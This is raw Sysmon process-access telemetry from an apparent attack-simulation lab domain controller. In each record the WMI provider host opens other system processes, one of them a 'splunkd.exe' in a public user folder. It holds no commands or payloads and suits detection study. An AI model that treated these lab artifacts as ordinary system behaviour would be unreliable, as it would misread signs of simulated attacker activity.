10341000x800000000000000024955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 